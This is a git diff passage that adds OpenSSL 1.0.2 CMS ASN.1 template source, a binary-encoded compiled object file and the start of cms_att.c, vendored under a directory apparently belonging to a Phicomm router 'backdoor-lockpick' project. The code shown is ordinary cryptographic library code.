+        ASN1_SEQUENCE_OF(CMS_KeyAgreeRecipientInfo, recipientEncryptedKeys, CMS_RecipientEncryptedKey)
+} ASN1_SEQUENCE_END_cb(CMS_KeyAgreeRecipientInfo, CMS_KeyAgreeRecipientInfo)
+
+ASN1_SEQUENCE(CMS_KEKIdentifier) = {
+        ASN1_SIMPLE(CMS_KEKIdentifier, keyIdentifier, ASN1_OCTET_STRING),
+        ASN1_OPT(CMS_KEKIdentifier, date, ASN1_GENERALIZEDTIME),
+        ASN1_OPT(CMS_KEKIdentifier, other, CMS_OtherKeyAttribute)
+} ASN1_SEQUENCE_END(CMS_KEKIdentifier)
+
+ASN1_SEQUENCE(CMS_KEKRecipientInfo) = {
+        ASN1_SIMPLE(CMS_KEKRecipientInfo, version, LONG),
+        ASN1_SIMPLE(CMS_KEKRecipientInfo, kekid, CMS_KEKIdentifier),
+        ASN1_SIMPLE(CMS_KEKRecipientInfo, keyEncryptionAlgorithm, X509_ALGOR),
+        ASN1_SIMPLE(CMS_KEKRecipientInfo, encryptedKey, ASN1_OCTET_STRING)
+} ASN1_SEQUENCE_END(CMS_KEKRecipientInfo)
+
+ASN1_SEQUENCE(CMS_PasswordRecipientInfo) = {
+        ASN1_SIMPLE(CMS_PasswordRecipientInfo, version, LONG),
+        ASN1_IMP_OPT(CMS_PasswordRecipientInfo, keyDerivationAlgorithm, X509_ALGOR, 0),
+        ASN1_SIMPLE(CMS_PasswordRecipientInfo, keyEncryptionAlgorithm, X509_ALGOR),
+        ASN1_SIMPLE(CMS_PasswordRecipientInfo, encryptedKey, ASN1_OCTET_STRING)
+} ASN1_SEQUENCE_END(CMS_PasswordRecipientInfo)
+
+ASN1_SEQUENCE(CMS_OtherRecipientInfo) = {
+  ASN1_SIMPLE(CMS_OtherRecipientInfo, oriType, ASN1_OBJECT),
+  ASN1_OPT(CMS_OtherRecipientInfo, oriValue, ASN1_ANY)
+} ASN1_SEQUENCE_END(CMS_OtherRecipientInfo)
+
+/* Free up RecipientInfo additional data */
+static int cms_ri_cb(int operation, ASN1_VALUE **pval, const ASN1_ITEM *it,
+                     void *exarg)
+{
+    if (operation == ASN1_OP_FREE_PRE) {
+        CMS_RecipientInfo *ri = (CMS_RecipientInfo *)*pval;
+        if (ri->type == CMS_RECIPINFO_TRANS) {
+            CMS_KeyTransRecipientInfo *ktri = ri->d.ktri;
+            if (ktri->pkey)
+                EVP_PKEY_free(ktri->pkey);
+            if (ktri->recip)
+                X509_free(ktri->recip);
+            if (ktri->pctx)
+                EVP_PKEY_CTX_free(ktri->pctx);
+        } else if (ri->type == CMS_RECIPINFO_KEK) {
+            CMS_KEKRecipientInfo *kekri = ri->d.kekri;
+            if (kekri->key) {
+                OPENSSL_cleanse(kekri->key, kekri->keylen);
+                OPENSSL_free(kekri->key);
+            }
+        } else if (ri->type == CMS_RECIPINFO_PASS) {
+            CMS_PasswordRecipientInfo *pwri = ri->d.pwri;
+            if (pwri->pass) {
+                OPENSSL_cleanse(pwri->pass, pwri->passlen);
+                OPENSSL_free(pwri->pass);
+            }
+        }
+    }
+    return 1;
+}
+
+ASN1_CHOICE_cb(CMS_RecipientInfo, cms_ri_cb) = {
+        ASN1_SIMPLE(CMS_RecipientInfo, d.ktri, CMS_KeyTransRecipientInfo),
+        ASN1_IMP(CMS_RecipientInfo, d.kari, CMS_KeyAgreeRecipientInfo, 1),
+        ASN1_IMP(CMS_RecipientInfo, d.kekri, CMS_KEKRecipientInfo, 2),
+        ASN1_IMP(CMS_RecipientInfo, d.pwri, CMS_PasswordRecipientInfo, 3),
+        ASN1_IMP(CMS_RecipientInfo, d.ori, CMS_OtherRecipientInfo, 4)
+} ASN1_CHOICE_END_cb(CMS_RecipientInfo, CMS_RecipientInfo, type)
+
+ASN1_NDEF_SEQUENCE(CMS_EnvelopedData) = {
+        ASN1_SIMPLE(CMS_EnvelopedData, version, LONG),
+        ASN1_IMP_OPT(CMS_EnvelopedData, originatorInfo, CMS_OriginatorInfo, 0),
+        ASN1_SET_OF(CMS_EnvelopedData, recipientInfos, CMS_RecipientInfo),
+        ASN1_SIMPLE(CMS_EnvelopedData, encryptedContentInfo, CMS_EncryptedContentInfo),
+        ASN1_IMP_SET_OF_OPT(CMS_EnvelopedData, unprotectedAttrs, X509_ATTRIBUTE, 1)
+} ASN1_NDEF_SEQUENCE_END(CMS_EnvelopedData)
+
+ASN1_NDEF_SEQUENCE(CMS_DigestedData) = {
+        ASN1_SIMPLE(CMS_DigestedData, version, LONG),
+        ASN1_SIMPLE(CMS_DigestedData, digestAlgorithm, X509_ALGOR),
+        ASN1_SIMPLE(CMS_DigestedData, encapContentInfo, CMS_EncapsulatedContentInfo),
+        ASN1_SIMPLE(CMS_DigestedData, digest, ASN1_OCTET_STRING)
+} ASN1_NDEF_SEQUENCE_END(CMS_DigestedData)
+
+ASN1_NDEF_SEQUENCE(CMS_EncryptedData) = {
+        ASN1_SIMPLE(CMS_EncryptedData, version, LONG),
+        ASN1_SIMPLE(CMS_EncryptedData, encryptedContentInfo, CMS_EncryptedContentInfo),
+        ASN1_IMP_SET_OF_OPT(CMS_EncryptedData, unprotectedAttrs, X509_ATTRIBUTE, 1)
+} ASN1_NDEF_SEQUENCE_END(CMS_EncryptedData)
+
+ASN1_NDEF_SEQUENCE(CMS_AuthenticatedData) = {
+        ASN1_SIMPLE(CMS_AuthenticatedData, version, LONG),
+        ASN1_IMP_OPT(CMS_AuthenticatedData, originatorInfo, CMS_OriginatorInfo, 0),
+        ASN1_SET_OF(CMS_AuthenticatedData, recipientInfos, CMS_RecipientInfo),
+        ASN1_SIMPLE(CMS_AuthenticatedData, macAlgorithm, X509_ALGOR),
+        ASN1_IMP(CMS_AuthenticatedData, digestAlgorithm, X509_ALGOR, 1),
+        ASN1_SIMPLE(CMS_AuthenticatedData, encapContentInfo, CMS_EncapsulatedContentInfo),
+        ASN1_IMP_SET_OF_OPT(CMS_AuthenticatedData, authAttrs, X509_ALGOR, 2),
+        ASN1_SIMPLE(CMS_AuthenticatedData, mac, ASN1_OCTET_STRING),
+        ASN1_IMP_SET_OF_OPT(CMS_AuthenticatedData, unauthAttrs, X509_ALGOR, 3)
+} ASN1_NDEF_SEQUENCE_END(CMS_AuthenticatedData)
+
+ASN1_NDEF_SEQUENCE(CMS_CompressedData) = {
+        ASN1_SIMPLE(CMS_CompressedData, version, LONG),
+        ASN1_SIMPLE(CMS_CompressedData, compressionAlgorithm, X509_ALGOR),
+        ASN1_SIMPLE(CMS_CompressedData, encapContentInfo, CMS_EncapsulatedContentInfo),
+} ASN1_NDEF_SEQUENCE_END(CMS_CompressedData)
+
+/* This is the ANY DEFINED BY table for the top level ContentInfo structure */
+
+ASN1_ADB_TEMPLATE(cms_default) = ASN1_EXP(CMS_ContentInfo, d.other, ASN1_ANY, 0);
+
+ASN1_ADB(CMS_ContentInfo) = {
+        ADB_ENTRY(NID_pkcs7_data, ASN1_NDEF_EXP(CMS_ContentInfo, d.data, ASN1_OCTET_STRING_NDEF, 0)),
+        ADB_ENTRY(NID_pkcs7_signed, ASN1_NDEF_EXP(CMS_ContentInfo, d.signedData, CMS_SignedData, 0)),
+        ADB_ENTRY(NID_pkcs7_enveloped, ASN1_NDEF_EXP(CMS_ContentInfo, d.envelopedData, CMS_EnvelopedData, 0)),
+        ADB_ENTRY(NID_pkcs7_digest, ASN1_NDEF_EXP(CMS_ContentInfo, d.digestedData, CMS_DigestedData, 0)),
+        ADB_ENTRY(NID_pkcs7_encrypted, ASN1_NDEF_EXP(CMS_ContentInfo, d.encryptedData, CMS_EncryptedData, 0)),
+        ADB_ENTRY(NID_id_smime_ct_authData, ASN1_NDEF_EXP(CMS_ContentInfo, d.authenticatedData, CMS_AuthenticatedData, 0)),
+        ADB_ENTRY(NID_id_smime_ct_compressedData, ASN1_NDEF_EXP(CMS_ContentInfo, d.compressedData, CMS_CompressedData, 0)),
+} ASN1_ADB_END(CMS_ContentInfo, 0, contentType, 0, &cms_default_tt, NULL);
+
+/* CMS streaming support */
+static int cms_cb(int operation, ASN1_VALUE **pval, const ASN1_ITEM *it,
+                  void *exarg)
+{
+    ASN1_STREAM_ARG *sarg = exarg;
+    CMS_ContentInfo *cms = NULL;
+    if (pval)
+        cms = (CMS_ContentInfo *)*pval;
+    else
+        return 1;
+    switch (operation) {
+
+    case ASN1_OP_STREAM_PRE:
+        if (CMS_stream(&sarg->boundary, cms) <= 0)
+            return 0;
+    case ASN1_OP_DETACHED_PRE:
+        sarg->ndef_bio = CMS_dataInit(cms, sarg->out);
+        if (!sarg->ndef_bio)
+            return 0;
+        break;
+
+    case ASN1_OP_STREAM_POST:
+    case ASN1_OP_DETACHED_POST:
+        if (CMS_dataFinal(cms, sarg->ndef_bio) <= 0)
+            return 0;
+        break;
+
+    }
+    return 1;
+}
+
+ASN1_NDEF_SEQUENCE_cb(CMS_ContentInfo, cms_cb) = {
+        ASN1_SIMPLE(CMS_ContentInfo, contentType, ASN1_OBJECT),
+        ASN1_ADB_OBJECT(CMS_ContentInfo)
+} ASN1_NDEF_SEQUENCE_END_cb(CMS_ContentInfo, CMS_ContentInfo)
+
+/* Specials for signed attributes */
+
+/*
+ * When signing attributes we want to reorder them to match the sorted
+ * encoding.
+ */
+
+ASN1_ITEM_TEMPLATE(CMS_Attributes_Sign) =
+        ASN1_EX_TEMPLATE_TYPE(ASN1_TFLG_SET_ORDER, 0, CMS_ATTRIBUTES, X509_ATTRIBUTE)
+ASN1_ITEM_TEMPLATE_END(CMS_Attributes_Sign)
+
+/*
+ * When verifying attributes we need to use the received order. So we use
+ * SEQUENCE OF and tag it to SET OF
+ */
+
+ASN1_ITEM_TEMPLATE(CMS_Attributes_Verify) =
+        ASN1_EX_TEMPLATE_TYPE(ASN1_TFLG_SEQUENCE_OF | ASN1_TFLG_IMPTAG | ASN1_TFLG_UNIVERSAL,
+                                V_ASN1_SET, CMS_ATTRIBUTES, X509_ATTRIBUTE)
+ASN1_ITEM_TEMPLATE_END(CMS_Attributes_Verify)
+
+
+
+ASN1_CHOICE(CMS_ReceiptsFrom) = {
+  ASN1_IMP(CMS_ReceiptsFrom, d.allOrFirstTier, LONG, 0),
+  ASN1_IMP_SEQUENCE_OF(CMS_ReceiptsFrom, d.receiptList, GENERAL_NAMES, 1)
+} ASN1_CHOICE_END(CMS_ReceiptsFrom)
+
+ASN1_SEQUENCE(CMS_ReceiptRequest) = {
+  ASN1_SIMPLE(CMS_ReceiptRequest, signedContentIdentifier, ASN1_OCTET_STRING),
+  ASN1_SIMPLE(CMS_ReceiptRequest, receiptsFrom, CMS_ReceiptsFrom),
+  ASN1_SEQUENCE_OF(CMS_ReceiptRequest, receiptsTo, GENERAL_NAMES)
+} ASN1_SEQUENCE_END(CMS_ReceiptRequest)
+
+ASN1_SEQUENCE(CMS_Receipt) = {
+  ASN1_SIMPLE(CMS_Receipt, version, LONG),
+  ASN1_SIMPLE(CMS_Receipt, contentType, ASN1_OBJECT),
+  ASN1_SIMPLE(CMS_Receipt, signedContentIdentifier, ASN1_OCTET_STRING),
+  ASN1_SIMPLE(CMS_Receipt, originatorSignatureValue, ASN1_OCTET_STRING)
+} ASN1_SEQUENCE_END(CMS_Receipt)
+
+/*
+ * Utilities to encode the CMS_SharedInfo structure used during key
+ * derivation.
+ */
+
+typedef struct {
+    X509_ALGOR *keyInfo;
+    ASN1_OCTET_STRING *entityUInfo;
+    ASN1_OCTET_STRING *suppPubInfo;
+} CMS_SharedInfo;
+
+ASN1_SEQUENCE(CMS_SharedInfo) = {
+  ASN1_SIMPLE(CMS_SharedInfo, keyInfo, X509_ALGOR),
+  ASN1_EXP_OPT(CMS_SharedInfo, entityUInfo, ASN1_OCTET_STRING, 0),
+  ASN1_EXP_OPT(CMS_SharedInfo, suppPubInfo, ASN1_OCTET_STRING, 2),
+} ASN1_SEQUENCE_END(CMS_SharedInfo)
+
+int CMS_SharedInfo_encode(unsigned char **pder, X509_ALGOR *kekalg,
+                          ASN1_OCTET_STRING *ukm, int keylen)
+{
+    union {
+        CMS_SharedInfo *pecsi;
+        ASN1_VALUE *a;
+    } intsi = {
+        NULL
+    };
+
+    ASN1_OCTET_STRING oklen;
+    unsigned char kl[4];
+    CMS_SharedInfo ecsi;
+
+    keylen <<= 3;
+    kl[0] = (keylen >> 24) & 0xff;
+    kl[1] = (keylen >> 16) & 0xff;
+    kl[2] = (keylen >> 8) & 0xff;
+    kl[3] = keylen & 0xff;
+    oklen.length = 4;
+    oklen.data = kl;
+    oklen.type = V_ASN1_OCTET_STRING;
+    oklen.flags = 0;
+    ecsi.keyInfo = kekalg;
+    ecsi.entityUInfo = ukm;
+    ecsi.suppPubInfo = &oklen;
+    intsi.pecsi = &ecsi;
+    return ASN1_item_i2d(intsi.a, pder, ASN1_ITEM_rptr(CMS_SharedInfo));
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_asn1.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_asn1.o
new file mode 100644
index 0000000000000000000000000000000000000000..14362fb61e56726ed64e596859b24f4610796660
GIT binary patch
literal 26680
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
Jf|A<h{}+!KWL^LO

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_att.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_att.c
new file mode 100644
index 0000000..f79a49d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_att.c
@@ -0,0 +1,197 @@
+/* crypto/cms/cms_att.c */
+/*
